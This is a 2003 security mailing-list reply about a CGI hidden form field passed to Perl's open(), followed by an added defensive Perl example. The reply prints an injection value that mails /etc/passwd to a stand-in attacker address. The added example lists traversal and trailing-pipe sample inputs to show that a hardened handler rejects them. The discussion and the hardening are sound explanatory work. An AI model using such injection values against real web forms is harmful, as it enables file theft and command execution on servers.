WebApp Sec mailing list archives
Re: htaccess with apache
From: Tim Tompkins <timt () spiderlinks org>
Date: Tue, 04 Nov 2003 13:48:15 -0700
A.D.Douma wrote:
> Hello, I had a similar problem with a cgi script that used a <input type='hidden' name='success' value=succes.'html'> to point the client's browser to the "transaction complete page". Because of this an attacker could read every file on the webserver. Luckily the /etc/passwd file was shadowed. My question is what else could an attacker do? Would command execution be possible? Thanks

It depends on how the open() is called. If the form value is used literally in an open(), you could construct a value such as, <input type="hidden" name="success" value="`cat /etc/passwd|mail attacker () somewhere com`|"> and have the password file mailed to you. Granted, this is a round-about way of reading the passwd file given that a non-sanitized value is anticipated to be passed in the attack, but other commands could be constructed in the same manner and executed under the privileges of the web server.
-- Tim Tompkins
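
The open() behaviour discussed in the reply above, as an added example that is not part of the original posts. It assumes the CGI script is written in Perl, which the thread does not state; `read_success_page`, `$PAGE_DIR` and the sample values are hypothetical. The risky two-argument call appears only as a comment, next to a hardened handler that allow-lists the hidden field and fixes the open mode.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Hypothetical directory holding the pages the form is allowed to point to.
my $PAGE_DIR = tempdir(CLEANUP => 1);
{
    open(my $out, '>', File::Spec->catfile($PAGE_DIR, 'success.html'))
        or die "setup: $!";
    print {$out} "<html>Transaction complete</html>\n";
    close($out);
}

# Risky pattern discussed in the thread: two-argument open() on a form value.
#   open(FH, $value);
# Perl reads the mode out of $value itself, so a trailing "|" makes it run
# the value as a command, and "../" walks out of the page directory.

# Hardened form: allow-list the name, then use three-argument open(), where
# the mode is fixed to '<' and the value can only ever be a file name.
sub read_success_page {
    my ($value) = @_;
    return (undef, 'rejected: not a plain page name')
        unless defined $value
            && $value =~ /\A([A-Za-z0-9_-]{1,64}\.html)\z/;
    my $path = File::Spec->catfile($PAGE_DIR, $1);
    open(my $fh, '<', $path)
        or return (undef, 'rejected: cannot open page');
    local $/;               # slurp the whole file
    my $body = <$fh>;
    close($fh);
    return ($body, 'ok');
}

# Constructed sample values for the hidden "success" field.
for my $value ('success.html', 'missing.html', '../../etc/passwd',
               'echo injected|', "success.html\0.txt") {
    my ($body, $status) = read_success_page($value);
    (my $shown = $value) =~ s/\0/\\0/g;   # make the NUL byte printable
    printf "%-22s => %s\n", $shown, $status;
}
```

Only `success.html` is served. The traversal, trailing-pipe and NUL-byte values are rejected before any open() call is made.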